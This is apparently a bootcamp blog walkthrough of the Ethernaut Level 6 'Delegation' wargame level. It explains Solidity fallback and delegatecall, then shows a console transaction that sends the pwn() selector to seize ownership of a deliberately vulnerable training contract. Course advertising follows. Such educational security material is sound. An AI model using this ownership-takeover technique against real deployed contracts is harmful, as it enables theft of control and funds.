Skip links

Table of Contents

Ethernaut Level 6 Walkthrough: Delegation

In this level, we will familiarize ourselves with delegatecall and fallback. This serves as a preliminary step towards understanding more advanced concepts, like the proxy pattern.This article will clarify delegatecall and fallback, demonstrating how to use this knowledge to overcome this challenge.

Goal of Ethernaut Level 6

Claim ownership of Delegation contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Delegate {
    address public owner;

    constructor(address _owner) {
        owner = _owner;
    }

    function pwn() public {
        owner = msg.sender;
    }
}

contract Delegation {
    address public owner;
    Delegate delegate;

    constructor(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }

    fallback() external {
        (bool result,) = address(delegate).delegatecall(msg.data);
        if (result) {
            this;
        }
    }
}

Understanding fallback and delegatecall

fallback()

fallback is a special function that is executed either when

  • calling non-existent functions
  • sending ether directly to a contract but receive() does not exist or msg.data is not empty

In this challenge, we are focusing on the first reason.

Example

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract FallbackContract {
		event Called(bytes data);
		
    fallback() external {
        emit Called(msg.data);
    }
}
  • Lets call helloWorld() of the above contract, as helloWorld() does not exist, fallback will be executed.
  • If we check emitted event, you will see
[
  {
    "from": "0xd2a5bC10698FD955D1Fe6cb468a17809A08fd005",
    "topic": "0x43728e47c6f378312077a49106659446a23766fc65b3674c995b89121d8efeea",
    "event": "Called",
    "args": {
      "0": "0xc605f76c",
      "data": "0xc605f76c"
    }
  }
]

About msg.data

msg.data is a special variable in Solidity that contains the data that is sent when calling a function on a smart contract.

When invoking a function, msg.data consists of the function selector and arguments.

  • The function selector is the first four bytes of the ****msg.data.
  • To calculate the function selector:
    1. Compute the keccak256 hash of the function signature (e.g., keccak256("helloWorld()")).
    2. Take the first 4 bytes of the hash.
    3. This resulting value is the function selector.

delegatecall()

  • delegatecall is a low level function similar to call.
  • When contract A executes delegatecall to contract BB‘s code is executed with contract A‘s storage, msg.sender and msg.value.

Example

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract A {
		uint256 public number;
		
    function delegateB(address contractB) external {
		    (bool success, bytes memory data) = contractB.delegatecall(
		        abi.encodeWithSignature("increase()")
        );
    }
}

contract B {
		uint256 public number;
		
    function increase() external {
        number+=1;
    }
}
  • When we execute delegateB, it results in the number of contract A being incremented, instead of the number of contract B.

Hacking

  1. We execute a call to pwn() within the Delegation contract.
  2. As pwn() is not a defined function in Delegation, the contract invokes its fallback function.
  3. The fallback function then invokes delegatecall to execute pwn() within the context of the Delegate contract, utilizing the storage of Delegation.
// Open your browser's console
sendTransaction({
		from: "<Player address>",
		to: "<Delegation contract address>",
		data:"0xdd365b8b" // pwn() selector
})

Congratulations! You completed the Ethernaut level 6 – Delegation challenge 🥳

Security Takeaways

  • Ensure you fully understand the calling contract when using delegatecall.
  • Please be careful about storage orders when using delegatecall. Ensure it correctly changes the state.

Ready for the next Ethernaut challenge? Click to check out the previous ethernaut challenge and see what’s next in our series!

faq

FAQs

What is the Ethernaut Level 6: Delegation challenge about?

  • The challenge involves interacting with a delegate call in Ethereum smart contracts to exploit vulnerabilities and take ownership of the contract.

How do you solve the Delegation level in Ethernaut?

  • The solution requires understanding delegate calls and how they can be manipulated to change contract states, including using the fallback function.

What skills are necessary to complete Ethernaut Level 6?

  • Knowledge of Solidity, smart contract security, the Ethereum Virtual Machine (EVM), and JavaScript for interacting with the blockchain.

Can completing Ethernaut Level 6 help improve my blockchain security skills?

  • Yes, it offers practical experience in identifying and exploiting smart contract vulnerabilities, crucial for blockchain security professionals.

What are delegate calls in Ethereum smart contracts?

  • Delegate calls are a feature that allows one contract to call another’s function and run it with the original contract’s storage context.

Where can I learn more about blockchain security?

  • Consider online courses, webinars, workshops, and industry conferences focused on cryptocurrency, blockchain technology, and cybersecurity.

What is Ethernaut and who should try it?

  • Ethernaut is an open-source wargame for those interested in Ethereum and smart contract security, ideal for developers and security enthusiasts.

How can one practice Ethereum smart contract coding?

  • Engage in coding challenges like Ethernaut, contribute to open-source projects, and build personal projects on Ethereum networks.

What are common vulnerabilities in Ethereum smart contracts?

  • Common issues include reentrancy attacks, mishandling of delegate calls, and failures in access control.

Why is understanding smart contracts important for blockchain technology?

  • Smart contracts are integral to decentralized applications on blockchain platforms; understanding them is crucial for building secure, efficient systems.

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy ✨

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet!

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

You may also like

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Events by Metana

Dive into the exciting world of Web3 with us as we explore cutting-edge technical topics, provide valuable insights into the job market landscape, and offer guidance on securing lucrative positions in Web3.

Subscribe to Lettercamp

We help you land your dream job! Subscribe to find out how

Start Your Application

Secure your spot now. Spots are limited, and we accept qualified applicants on a first come, first served basis..

Career Track(Required)

The application is free and takes just 3 minutes to complete.

What is included in the course?

Expert-curated curriculum

Weekly 1:1 video calls with your mentor

Weekly group mentoring calls

On-demand mentor support

Portfolio reviews by Design hiring managers

Resume & LinkedIn profile reviews

Active online student community

1:1 and group career coaching calls

Access to our employer network

Job Guarantee

Get a detailed look at our Full Stack Bootcamp

Understand the goal of the bootcamp

Find out more about the course

Explore our methodology & what technologies we teach

You are downloading 2024 updated Full stack Bootcamp syllabus!

Download the syllabus to discover our Full-Stack Software Engineering Bootcamp curriculum, including key modules, project-based learning details, skill outcomes, and career support. Get a clear path to becoming a top developer.

"*" indicates required fields

This field is for validation purposes and should be left unchanged.